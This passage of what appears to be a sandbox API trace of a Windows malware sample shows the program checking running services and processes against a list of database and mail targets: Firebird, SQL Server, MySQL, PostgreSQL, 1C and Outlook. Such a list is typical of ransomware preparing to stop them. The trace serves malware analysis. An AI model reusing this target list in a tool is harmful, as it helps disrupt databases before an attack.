(lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0037.079] lstrlenW (lpString="PlugPlay") returned 8 [0037.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0037.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0037.079] lstrlenW (lpString="Power") returned 5 [0037.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0037.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0037.079] lstrlenW (lpString="ProfSvc") returned 7 [0037.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0037.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0037.079] lstrlenW (lpString="RpcEptMapper") returned 12 [0037.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0037.080] lstrlenW (lpString="RpcSs") returned 5 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0037.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0037.080] lstrlenW (lpString="SamSs") returned 5 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0037.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0037.080] lstrlenW (lpString="Schedule") returned 8 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0037.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0037.080] lstrlenW (lpString="SENS") returned 4 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0037.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0037.080] lstrlenW (lpString="ShellHWDetection") returned 16 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0037.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0037.080] lstrlenW (lpString="Spooler") returned 7 [0037.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0037.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0037.080] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0037.080] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0037.081] lstrlenW (lpString="SysMain") returned 7 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0037.081] lstrlenW (lpString="Themes") returned 6 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0037.081] lstrlenW (lpString="TrkWks") returned 6 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0037.081] lstrlenW (lpString="UxSms") returned 5 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0037.081] lstrlenW (lpString="VSS") returned 3 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0037.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0037.081] lstrlenW (lpString="WdiServiceHost") returned 14 [0037.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.081] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0037.081] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0037.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0037.082] lstrlenW (lpString="WdiSystemHost") returned 13 [0037.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.082] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0037.082] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0037.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0037.082] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0037.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.082] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0037.082] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0037.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0037.082] lstrlenW (lpString="Winmgmt") returned 7 [0037.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0037.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0037.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0037.082] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0037.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0037.082] lstrlenW (lpString="WPDBusEnum") returned 10 [0037.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.082] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0037.082] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0037.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0037.082] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbcaca8 | out: hHeap=0xb10000) returned 1 [0037.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e4 [0037.085] Process32FirstW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0037.086] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0037.086] lstrlenW (lpString="System") returned 6 [0037.086] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0037.086] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0037.086] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0037.087] lstrlenW (lpString="smss.exe") returned 8 [0037.087] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0037.087] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0037.087] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.088] lstrlenW (lpString="csrss.exe") returned 9 [0037.088] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.088] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.088] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.088] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.088] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.088] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.088] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0037.088] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0037.089] lstrlenW (lpString="wininit.exe") returned 11 [0037.089] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0037.089] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0037.089] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.090] lstrlenW (lpString="csrss.exe") returned 9 [0037.090] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.090] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0037.091] lstrlenW (lpString="winlogon.exe") returned 12 [0037.091] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0037.091] lstrlenW (lpString="services.exe") returned 12 [0037.091] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0037.092] lstrlenW (lpString="lsass.exe") returned 9 [0037.092] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0037.093] lstrlenW (lpString="lsm.exe") returned 7 [0037.093] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.094] lstrlenW (lpString="svchost.exe") returned 11 [0037.094] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.094] lstrlenW (lpString="svchost.exe") returned 11 [0037.094] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.095] lstrlenW (lpString="svchost.exe") returned 11 [0037.095] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.096] lstrlenW (lpString="svchost.exe") returned 11 [0037.096] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.097] lstrlenW (lpString="svchost.exe") returned 11 [0037.097] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0037.097] lstrlenW (lpString="audiodg.exe") returned 11 [0037.097] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.098] lstrlenW (lpString="svchost.exe") returned 11 [0037.098] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.099] lstrlenW (lpString="svchost.exe") returned 11 [0037.099] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0037.100] lstrlenW (lpString="dwm.exe") returned 7 [0037.100] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0037.101] lstrlenW (lpString="explorer.exe") returned 12 [0037.101] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0037.102] lstrlenW (lpString="spoolsv.exe") returned 11 [0037.102] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.102] lstrlenW (lpString="taskhost.exe") returned 12 [0037.102] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.103] lstrlenW (lpString="svchost.exe") returned 11 [0037.103] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0037.104] lstrlenW (lpString="taskeng.exe") returned 11 [0037.104] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.104] lstrlenW (lpString="taskhost.exe") returned 12 [0037.104] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0037.105] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0037.105] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0037.106] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0037.106] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0037.107] lstrlenW (lpString="sa_shape.exe") returned 12 [0037.107] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0037.107] lstrlenW (lpString="confidence.exe") returned 14 [0037.107] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0037.108] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0037.108] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0037.109] lstrlenW (lpString="blue.exe") returned 8 [0037.109] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0037.109] lstrlenW (lpString="newly debut.exe") returned 15 [0037.110] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0037.110] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0037.110] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0037.111] lstrlenW (lpString="archive.exe") returned 11 [0037.111] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0037.112] lstrlenW (lpString="defend.exe") returned 10 [0037.112] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0037.112] lstrlenW (lpString="arservice.exe") returned 13 [0037.112] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0037.113] lstrlenW (lpString="rr-programmer.exe") returned 17 [0037.113] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0037.114] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0037.114] Process32NextW (in: hSnapshot=0x1e4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 